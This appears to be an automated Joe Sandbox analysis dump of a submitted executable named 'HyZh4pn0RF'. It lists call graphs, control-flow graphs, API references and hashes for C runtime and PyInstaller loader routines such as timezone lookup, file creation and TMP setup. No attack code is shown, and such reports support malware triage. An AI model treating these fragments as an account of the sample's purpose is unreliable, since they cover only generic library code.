__CxxCallCatchBlock 45 API calls 15861->15862 15863 7ff78f4a2cc9 15862->15863 15865 7ff78f4a2789 GetCPInfo 15864->15865 15874 7ff78f4a287f 15864->15874 15871 7ff78f4a279c 15865->15871 15865->15874 15866 7ff78f48bcc0 _wfindfirst32i64 8 API calls 15868 7ff78f4a291e 15866->15868 15868->15807 15875 7ff78f4a34b0 15871->15875 15874->15866 15876 7ff78f494f98 45 API calls 15875->15876 15877 7ff78f4a34f2 15876->15877 15895 7ff78f49fc00 15877->15895 15897 7ff78f49fc09 MultiByteToWideChar 15895->15897 15953 7ff78f4998d9 15952->15953 15954 7ff78f499a3d 15952->15954 15953->15736 15955 7ff78f499a66 15954->15955 15956 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15954->15956 15957 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15955->15957 15956->15954 15957->15953 15959 7ff78f4a6c30 15958->15959 15960 7ff78f4a6c19 15958->15960 15959->15960 15963 7ff78f4a6c3e 15959->15963 15961 7ff78f4954c4 _get_daylight 11 API calls 15960->15961 15962 7ff78f4a6c1e 15961->15962 15964 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 15962->15964 15965 7ff78f4a6c29 15963->15965 15966 7ff78f494f98 45 API calls 15963->15966 15964->15965 15965->15578 15966->15965 15968 7ff78f494f98 45 API calls 15967->15968 15969 7ff78f4a9849 15968->15969 15972 7ff78f4a94a0 15969->15972 15974 7ff78f4a94ee 15972->15974 15973 7ff78f48bcc0 _wfindfirst32i64 8 API calls 15975 7ff78f4a7ad5 15973->15975 15977 7ff78f4a9560 GetCPInfo 15974->15977 15978 7ff78f4a9575 15974->15978 15981 7ff78f4a9579 15974->15981 15975->15578 15975->15604 15976 7ff78f49fc00 _fread_nolock MultiByteToWideChar 15979 7ff78f4a960d 15976->15979 15977->15978 15977->15981 15978->15976 15978->15981 15980 7ff78f49dbbc _fread_nolock 12 API calls 15979->15980 15979->15981 15982 7ff78f4a9644 15979->15982 15980->15982 15981->15973 15982->15981 15983 7ff78f49fc00 _fread_nolock MultiByteToWideChar 15982->15983 15984 7ff78f4a96b2 15983->15984 15985 7ff78f4a9794 15984->15985 15986 7ff78f49fc00 _fread_nolock MultiByteToWideChar 15984->15986 15985->15981 15987 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15985->15987 15988 7ff78f4a96d8 15986->15988 15987->15981 15988->15985 15989 7ff78f49dbbc _fread_nolock 12 API calls 15988->15989 15990 7ff78f4a9705 15988->15990 15989->15990 15990->15985 15991 7ff78f49fc00 _fread_nolock MultiByteToWideChar 15990->15991 15992 7ff78f4a977c 15991->15992 15993 7ff78f4a9782 15992->15993 15994 7ff78f4a979c 15992->15994 15993->15985 15997 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15993->15997 16001 7ff78f49f428 15994->16001 15997->15985 15998 7ff78f4a97db 15998->15981 16000 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15998->16000 15999 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15999->15998 16000->15981 16002 7ff78f49f1d0 __crtLCMapStringW 5 API calls 16001->16002 16003 7ff78f49f466 16002->16003 16004 7ff78f49f46e 16003->16004 16005 7ff78f49f690 __crtLCMapStringW 5 API calls 16003->16005 16004->15998 16004->15999 16006 7ff78f49f4d7 CompareStringW 16005->16006 16006->16004 16008 7ff78f4a8511 16007->16008 16009 7ff78f4a852a HeapSize 16007->16009 16010 7ff78f4954c4 _get_daylight 11 API calls 16008->16010 16011 7ff78f4a8516 16010->16011 16012 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 16011->16012 16013 7ff78f4a8521 16012->16013 16013->15611 16015 7ff78f4a0ed1 16014->16015 16016 7ff78f4a0edb 16014->16016 16017 7ff78f49dbbc _fread_nolock 12 API calls 16015->16017 16018 7ff78f4a0ee0 16016->16018 16024 7ff78f4a0ee7 _get_daylight 16016->16024 16022 7ff78f4a0ed9 16017->16022 16019 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16018->16019 16019->16022 16020 7ff78f4a0f1a HeapReAlloc 16020->16022 16020->16024 16021 7ff78f4a0eed 16023 7ff78f4954c4 _get_daylight 11 API calls 16021->16023 16022->15613 16023->16022 16024->16020 16024->16021 16025 7ff78f4a3c00 _get_daylight 2 API calls 16024->16025 16025->16024 16027 7ff78f49f1d0 __crtLCMapStringW 5 API calls 16026->16027 16028 7ff78f49f404 16027->16028 16028->15617 16030 7ff78f4955d2 16029->16030 16031 7ff78f4955ae 16029->16031 16032 7ff78f4955d7 16030->16032 16033 7ff78f49562c 16030->16033 16034 7ff78f4955bd 16031->16034 16036 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16031->16036 16032->16034 16037 7ff78f4955ec 16032->16037 16038 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16032->16038 16035 7ff78f49fc00 _fread_nolock MultiByteToWideChar 16033->16035 16034->15621 16034->15622 16043 7ff78f495648 16035->16043 16036->16034 16039 7ff78f49dbbc _fread_nolock 12 API calls 16037->16039 16038->16037 16039->16034 16040 7ff78f49564f GetLastError 16051 7ff78f495438 16040->16051 16043->16040 16046 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16043->16046 16049 7ff78f49567d 16043->16049 16050 7ff78f49568a 16043->16050 16044 7ff78f49fc00 _fread_nolock MultiByteToWideChar 16048 7ff78f4956ce 16044->16048 16045 7ff78f4954c4 _get_daylight 11 API calls 16045->16034 16046->16049 16047 7ff78f49dbbc _fread_nolock 12 API calls 16047->16050 16048->16034 16048->16040 16049->16047 16050->16034 16050->16044 16052 7ff78f49b888 _get_daylight 11 API calls 16051->16052 16053 7ff78f495445 Concurrency::details::SchedulerProxy::DeleteThis 16052->16053 16054 7ff78f49b888 _get_daylight 11 API calls 16053->16054 16055 7ff78f495467 16054->16055 16055->16045 16057 7ff78f4997b1 16056->16057 16058 7ff78f4997b5 16056->16058 16057->15635 16069 7ff78f499b5c 16057->16069 16077 7ff78f4a30ac GetEnvironmentStringsW 16058->16077 16061 7ff78f4997c2 16063 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16061->16063 16062 7ff78f4997ce 16084 7ff78f49991c 16062->16084 16063->16057 16066 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16067 7ff78f4997f5 16066->16067 16068 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16067->16068 16068->16057 16070 7ff78f499b7f 16069->16070 16075 7ff78f499b96 16069->16075 16070->15635 16071 7ff78f49f158 _get_daylight 11 API calls 16071->16075 16072 7ff78f499c0a 16074 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16072->16074 16073 7ff78f49fc00 MultiByteToWideChar _fread_nolock 16073->16075 16074->16070 16075->16070 16075->16071 16075->16072 16075->16073 16076 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16075->16076 16076->16075 16078 7ff78f4a30d0 16077->16078 16079 7ff78f4997ba 16077->16079 16080 7ff78f49dbbc _fread_nolock 12 API calls 16078->16080 16079->16061 16079->16062 16082 7ff78f4a3107 memcpy_s 16080->16082 16081 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16083 7ff78f4a3127 FreeEnvironmentStringsW 16081->16083 16082->16081 16083->16079 16085 7ff78f499944 16084->16085 16086 7ff78f49f158 _get_daylight 11 API calls 16085->16086 16098 7ff78f49997f 16086->16098 16087 7ff78f499987 16088 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16087->16088 16089 7ff78f4997d6 16088->16089 16089->16066 16090 7ff78f499a01 16091 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16090->16091 16091->16089 16092 7ff78f49f158 _get_daylight 11 API calls 16092->16098 16093 7ff78f4999f0 16095 7ff78f499a38 11 API calls 16093->16095 16094 7ff78f4a0e54 _wfindfirst32i64 37 API calls 16094->16098 16096 7ff78f4999f8 16095->16096 16099 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16096->16099 16097 7ff78f499a24 16101 7ff78f49aec4 _wfindfirst32i64 17 API calls 16097->16101 16098->16087 16098->16090 16098->16092 16098->16093 16098->16094 16098->16097 16100 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16098->16100 16099->16087 16100->16098 16102 7ff78f499a36 16101->16102 16104 7ff78f4a9409 __crtLCMapStringW 16103->16104 16105 7ff78f4a79be 16104->16105 16106 7ff78f49f428 6 API calls 16104->16106 16105->15661 16105->15662 16106->16105

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 133 7ff78f4a6370-7ff78f4a63ab call 7ff78f4a5cf8 call 7ff78f4a5d00 call 7ff78f4a5d68 140 7ff78f4a63b1-7ff78f4a63bc call 7ff78f4a5d08 133->140 141 7ff78f4a65d5-7ff78f4a6621 call 7ff78f49aec4 call 7ff78f4a5cf8 call 7ff78f4a5d00 call 7ff78f4a5d68 133->141 140->141 146 7ff78f4a63c2-7ff78f4a63cc 140->146 167 7ff78f4a675f-7ff78f4a67cd call 7ff78f49aec4 call 7ff78f4a1be8 141->167 168 7ff78f4a6627-7ff78f4a6632 call 7ff78f4a5d08 141->168 148 7ff78f4a63ee-7ff78f4a63f2 146->148 149 7ff78f4a63ce-7ff78f4a63d1 146->149 152 7ff78f4a63f5-7ff78f4a63fd 148->152 151 7ff78f4a63d4-7ff78f4a63df 149->151 154 7ff78f4a63e1-7ff78f4a63e8 151->154 155 7ff78f4a63ea-7ff78f4a63ec 151->155 152->152 156 7ff78f4a63ff-7ff78f4a6412 call 7ff78f49dbbc 152->156 154->151 154->155 155->148 158 7ff78f4a641b-7ff78f4a6429 155->158 163 7ff78f4a6414-7ff78f4a6416 call 7ff78f49af0c 156->163 164 7ff78f4a642a-7ff78f4a6436 call 7ff78f49af0c 156->164 163->158 175 7ff78f4a643d-7ff78f4a6445 164->175 185 7ff78f4a67cf-7ff78f4a67d6 167->185 186 7ff78f4a67db-7ff78f4a67de 167->186 168->167 176 7ff78f4a6638-7ff78f4a6643 call 7ff78f4a5d38 168->176 175->175 178 7ff78f4a6447-7ff78f4a6458 call 7ff78f4a0e54 175->178 176->167 187 7ff78f4a6649-7ff78f4a666c call 7ff78f49af0c GetTimeZoneInformation 176->187 178->141 188 7ff78f4a645e-7ff78f4a64b4 call 7ff78f48d0e0 * 4 call 7ff78f4a628c 178->188 189 7ff78f4a686b-7ff78f4a686e 185->189 190 7ff78f4a67e0 186->190 191 7ff78f4a6815-7ff78f4a6828 call 7ff78f49dbbc 186->191 201 7ff78f4a6672-7ff78f4a6693 187->201 202 7ff78f4a6734-7ff78f4a675e call 7ff78f4a5cf0 call 7ff78f4a5ce0 call 7ff78f4a5ce8 187->202 246 7ff78f4a64b6-7ff78f4a64ba 188->246 194 7ff78f4a67e3 call 7ff78f4a65ec 189->194 197 7ff78f4a6874-7ff78f4a687c call 7ff78f4a6370 189->197 190->194 205 7ff78f4a6833-7ff78f4a684e call 7ff78f4a1be8 191->205 206 7ff78f4a682a 191->206 207 7ff78f4a67e8-7ff78f4a6814 call 7ff78f49af0c call 7ff78f48bcc0 194->207 197->207 208 7ff78f4a6695-7ff78f4a669b 201->208 209 7ff78f4a669e-7ff78f4a66a5 201->209 230 7ff78f4a6850-7ff78f4a6853 205->230 231 7ff78f4a6855-7ff78f4a6867 call 7ff78f49af0c 205->231 213 7ff78f4a682c-7ff78f4a6831 call 7ff78f49af0c 206->213 208->209 216 7ff78f4a66a7-7ff78f4a66af 209->216 217 7ff78f4a66b9 209->217 213->190 216->217 224 7ff78f4a66b1-7ff78f4a66b7 216->224 220 7ff78f4a66bb-7ff78f4a672f call 7ff78f48d0e0 * 4 call 7ff78f4a31cc call 7ff78f4a6884 * 2 217->220 220->202 224->220 230->213 231->189 248 7ff78f4a64c0-7ff78f4a64c4 246->248 249 7ff78f4a64bc 246->249 248->246 251 7ff78f4a64c6-7ff78f4a64eb call 7ff78f49706c 248->251 249->248 257 7ff78f4a64ee-7ff78f4a64f2 251->257 259 7ff78f4a6501-7ff78f4a6505 257->259 260 7ff78f4a64f4-7ff78f4a64ff 257->260 259->257 260->259 262 7ff78f4a6507-7ff78f4a650b 260->262 264 7ff78f4a658c-7ff78f4a6590 262->264 265 7ff78f4a650d-7ff78f4a6535 call 7ff78f49706c 262->265 266 7ff78f4a6592-7ff78f4a6594 264->266 267 7ff78f4a6597-7ff78f4a65a4 264->267 272 7ff78f4a6553-7ff78f4a6557 265->272 273 7ff78f4a6537 265->273 266->267 270 7ff78f4a65bf-7ff78f4a65ce call 7ff78f4a5cf0 call 7ff78f4a5ce0 267->270 271 7ff78f4a65a6-7ff78f4a65bc call 7ff78f4a628c 267->271 270->141 271->270 272->264 279 7ff78f4a6559-7ff78f4a6577 call 7ff78f49706c 272->279 277 7ff78f4a653a-7ff78f4a6541 273->277 277->272 280 7ff78f4a6543-7ff78f4a6551 277->280 285 7ff78f4a6583-7ff78f4a658a 279->285 280->272 280->277 285->264 286 7ff78f4a6579-7ff78f4a657d 285->286 286->264 287 7ff78f4a657f 286->287 287->285
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF78F4A63B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F4A5D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A5D1C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F49AF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF22
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F49AF0C: GetLastError.KERNEL32(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF2C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F49AEC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF78F49AEA3,?,?,?,?,?,00007FF78F4930CC), ref: 00007FF78F49AECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F49AEC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF78F49AEA3,?,?,?,?,?,00007FF78F4930CC), ref: 00007FF78F49AEF2
                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF78F4A63A4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F4A5D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A5D7C
                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF78F4A661A
                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF78F4A662B
                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF78F4A663C
                                                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF78F4A687C), ref: 00007FF78F4A6663
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                                                                  • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                                                                  • Opcode ID: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
                                                                                                                                                                                                                                                                                                  • Instruction ID: a73aef75f4388d26dc4139e74757c0e68c4c951cdcd4ba4423bdbfe4c9a40efd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8ED1B036E1929286E720BF26D8505F9A761FF84794FE08137EA0D47A95EF3CE441C760

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 318 7ff78f4a72bc-7ff78f4a732f call 7ff78f4a6ff0 321 7ff78f4a7331-7ff78f4a733a call 7ff78f4954a4 318->321 322 7ff78f4a7349-7ff78f4a7353 call 7ff78f498434 318->322 327 7ff78f4a733d-7ff78f4a7344 call 7ff78f4954c4 321->327 328 7ff78f4a7355-7ff78f4a736c call 7ff78f4954a4 call 7ff78f4954c4 322->328 329 7ff78f4a736e-7ff78f4a73d7 CreateFileW 322->329 341 7ff78f4a768a-7ff78f4a76aa 327->341 328->327 332 7ff78f4a7454-7ff78f4a745f GetFileType 329->332 333 7ff78f4a73d9-7ff78f4a73df 329->333 335 7ff78f4a74b2-7ff78f4a74b9 332->335 336 7ff78f4a7461-7ff78f4a749c GetLastError call 7ff78f495438 CloseHandle 332->336 338 7ff78f4a7421-7ff78f4a744f GetLastError call 7ff78f495438 333->338 339 7ff78f4a73e1-7ff78f4a73e5 333->339 344 7ff78f4a74c1-7ff78f4a74c4 335->344 345 7ff78f4a74bb-7ff78f4a74bf 335->345 336->327 352 7ff78f4a74a2-7ff78f4a74ad call 7ff78f4954c4 336->352 338->327 339->338 346 7ff78f4a73e7-7ff78f4a741f CreateFileW 339->346 350 7ff78f4a74ca-7ff78f4a751f call 7ff78f49834c 344->350 351 7ff78f4a74c6 344->351 345->350 346->332 346->338 356 7ff78f4a7521-7ff78f4a752d call 7ff78f4a71f8 350->356 357 7ff78f4a753e-7ff78f4a756f call 7ff78f4a6d70 350->357 351->350 352->327 356->357 363 7ff78f4a752f 356->363 364 7ff78f4a7571-7ff78f4a7573 357->364 365 7ff78f4a7575-7ff78f4a75b7 357->365 366 7ff78f4a7531-7ff78f4a7539 call 7ff78f49b084 363->366 364->366 367 7ff78f4a75d9-7ff78f4a75e4 365->367 368 7ff78f4a75b9-7ff78f4a75bd 365->368 366->341 371 7ff78f4a7688 367->371 372 7ff78f4a75ea-7ff78f4a75ee 367->372 368->367 370 7ff78f4a75bf-7ff78f4a75d4 368->370 370->367 371->341 372->371 373 7ff78f4a75f4-7ff78f4a7639 CloseHandle CreateFileW 372->373 375 7ff78f4a763b-7ff78f4a7669 GetLastError call 7ff78f495438 call 7ff78f498574 373->375 376 7ff78f4a766e-7ff78f4a7683 373->376 375->376 376->371
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
                                                                                                                                                                                                                                                                                                  • Instruction ID: c0d9131b9762558f9808ba47a9fcd7019f2ad68f4de5e03aa10e30ffd471ebad
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68C1D233B25A8285EB20DF69C4806EC7761FB48BA8BA15236DE2E577E5CF38D455C310

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF78F48154F), ref: 00007FF78F4879E7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F487B60: GetEnvironmentVariableW.KERNEL32(00007FF78F483A1F), ref: 00007FF78F487B9A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F487B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF78F487BB7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F497DEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F497E05
                                                                                                                                                                                                                                                                                                  • SetEnvironmentVariableW.KERNEL32 ref: 00007FF78F487AA1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F482B30: MessageBoxW.USER32 ref: 00007FF78F482C05
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                                                                  • API String ID: 3752271684-1116378104
                                                                                                                                                                                                                                                                                                  • Opcode ID: d0ee005bfdeb011a84540aff6346199bb1fc02b76f4ac94b865217064e0c6b04
                                                                                                                                                                                                                                                                                                  • Instruction ID: fef13944295f18d2f08830f08bfb372d368834703f256f56e2b648f59954a0c7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0ee005bfdeb011a84540aff6346199bb1fc02b76f4ac94b865217064e0c6b04
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F515131B2A2C341FA55B76698656FAD2917F89BC0FF44433ED0E477A6EE2CE401C220

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 792 7ff78f4a65ec-7ff78f4a6621 call 7ff78f4a5cf8 call 7ff78f4a5d00 call 7ff78f4a5d68 799 7ff78f4a675f-7ff78f4a67cd call 7ff78f49aec4 call 7ff78f4a1be8 792->799 800 7ff78f4a6627-7ff78f4a6632 call 7ff78f4a5d08 792->800 811 7ff78f4a67cf-7ff78f4a67d6 799->811 812 7ff78f4a67db-7ff78f4a67de 799->812 800->799 805 7ff78f4a6638-7ff78f4a6643 call 7ff78f4a5d38 800->805 805->799 813 7ff78f4a6649-7ff78f4a666c call 7ff78f49af0c GetTimeZoneInformation 805->813 814 7ff78f4a686b-7ff78f4a686e 811->814 815 7ff78f4a67e0 812->815 816 7ff78f4a6815-7ff78f4a6828 call 7ff78f49dbbc 812->816 824 7ff78f4a6672-7ff78f4a6693 813->824 825 7ff78f4a6734-7ff78f4a675e call 7ff78f4a5cf0 call 7ff78f4a5ce0 call 7ff78f4a5ce8 813->825 818 7ff78f4a67e3 call 7ff78f4a65ec 814->818 820 7ff78f4a6874-7ff78f4a687c call 7ff78f4a6370 814->820 815->818 827 7ff78f4a6833-7ff78f4a684e call 7ff78f4a1be8 816->827 828 7ff78f4a682a 816->828 829 7ff78f4a67e8-7ff78f4a6814 call 7ff78f49af0c call 7ff78f48bcc0 818->829 820->829 830 7ff78f4a6695-7ff78f4a669b 824->830 831 7ff78f4a669e-7ff78f4a66a5 824->831 848 7ff78f4a6850-7ff78f4a6853 827->848 849 7ff78f4a6855-7ff78f4a6867 call 7ff78f49af0c 827->849 834 7ff78f4a682c-7ff78f4a6831 call 7ff78f49af0c 828->834 830->831 837 7ff78f4a66a7-7ff78f4a66af 831->837 838 7ff78f4a66b9 831->838 834->815 837->838 844 7ff78f4a66b1-7ff78f4a66b7 837->844 840 7ff78f4a66bb-7ff78f4a672f call 7ff78f48d0e0 * 4 call 7ff78f4a31cc call 7ff78f4a6884 * 2 838->840 840->825 844->840 848->834 849->814
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF78F4A661A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F4A5D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A5D7C
                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF78F4A662B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F4A5D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A5D1C
                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF78F4A663C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F4A5D38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A5D4C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F49AF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF22
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F49AF0C: GetLastError.KERNEL32(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF2C
                                                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF78F4A687C), ref: 00007FF78F4A6663
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
